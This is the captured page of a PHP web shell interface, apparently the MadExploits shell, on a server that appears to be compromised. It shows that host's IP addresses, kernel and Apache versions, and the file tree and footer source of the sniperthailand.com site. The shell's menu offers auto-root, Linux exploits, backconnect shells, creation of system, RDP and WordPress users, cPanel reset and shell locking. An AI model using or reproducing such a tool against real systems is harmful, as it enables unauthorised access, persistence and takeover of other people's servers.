Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.216.188.48
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 4End.php
<script type="text/javascript" src="assets/cache/bottom-797a9b50.js"></script> <script src="assets/flickity/flickity.pkgd.min.js" async></script> <script src="assets/js/js.cookie.js"></script> <script src="assets/js/modal.js"></script> <script> jQuery(window).on('load', function() { $('#topcat .categories-top').flickity({ // options cellAlign: 'left', contain: true, wrapAround: true, autoPlay: false, pageDots: false }); }); $(window).on('load', function() { $('#bonslider .owl-item img').css('opacity', '1'); }); /* $(window).on('load', function() { if($('.owl-carousel-bonslider').length){ setBonsliderBackground($('.owl-carousel-bonslider')[0]); $('.owl-carousel-bonslider').owlCarousel().on('changed.owl.carousel', function(event) { var target = event.target; setBonsliderBackground(target); }); } function setBonsliderBackground(target){ var childrenDivs = target.children[0].children[0].children; var objKey = 0; for(var i = 0; i < childrenDivs.length; i++){ childrenDivs[i].classList.forEach(function(value, key, listObj){ if(value == 'active'){ objKey = i; } }); } if(objKey != 0){ $('<style>#bonslider:after{background-image:url(/modules/bonslider/images/' + childrenDivs[objKey].children[0].dataset.backgroundImage + ')}</style>').appendTo('head'); // document.styleSheets[0].addRule('#bonslider:after', 'url(/modules/bonslider/images/' + childrenDivs[objKey].children[0].dataset.backgroundImage + ')'); // $('#bonslider::after').css('background-image', 'url(/modules/bonslider/images/' + childrenDivs[objKey].children[0].dataset.backgroundImage + ')'); // $('#bonslider:after').css('background-image', '/themes/cormak/assets/img/sliderLayerRed.png'); } } }); */ $(document).ready(function() { if (Cookies.get('cookies-acceptance') === undefined || Cookies.get('cookies-acceptance') == '') { $('body').addClass('cookies-info-visible'); $('.cookies-info-bottom').show(); } $('.cookies-info-bottom button').click(function() { Cookies.set('cookies-acceptance', '1', { expires: 7, path: '/' }); $('.cookies-info-bottom').fadeOut(400, function() { $('body').removeClass('cookies-info-visible'); }); }); $('#submitMessage').click(function(e) { e.preventDefault(); $('#res_msg').fadeOut(); $('#res_msg').removeClass('alert-danger'); $('#res_msg').removeClass('alert-success'); $.post(igkConsultantsAjaxLink, { name: $('#name').val(), email: $('#email').val(), phone: $('#phone').val(), message: $('#message').val(), id_product: $('#id_product').val(), product_name: $('#product_name').val(), action: 'submit_form', }) .done(function(response) { response = JSON.parse(response); if (response.status == true) { $('#res_msg').text(response.msg); $('#res_msg').addClass('alert-success'); $('.contact-form-box').fadeOut(400, function() { $('#res_msg').fadeIn(); }); } else { $('#res_msg').text('Wystąpił bład, spróbuj ponownie'); $('#res_msg').addClass('alert-danger'); $('#res_msg').fadeIn(); } }); }); $(document).on('click', 'a[href="#product-contact-form"]', function(event) { event.preventDefault(); $('html, body').animate({ scrollTop: $($.attr(this, 'href')).offset().top }, 500); }); }); </script> <script> if (getCookie('change_view') != 'yes') { document.cookie = "change_view%3dno%3b%20path%3d/#"; } $('.sort-by-row .show_grid').click(function() { document.cookie = "change_view%3dyes%3b%20path%3d/#"; }); function getCookie(cname) { var name = cname + "="; var decodedCookie = decodeURIComponent(document.cookie); var ca = decodedCookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } </script> <script> $('body#contact form#form__contact').submit(function(event) { event.preventDefault(); var data = $(this).serializeArray(); $.post($(this).attr('action'), data); $('#form__contact input[type="submit"]').val('Wysłano'); $('#form__contact input').attr("disabled", true); $('#form__contact input').attr("disabled", true); $('#form__contact select').attr("disabled", true); $('#form__contact textarea').attr("disabled", true); $('#form__contact button[type="submit"]').attr("disabled", true); }); </script> </body> </html>
Close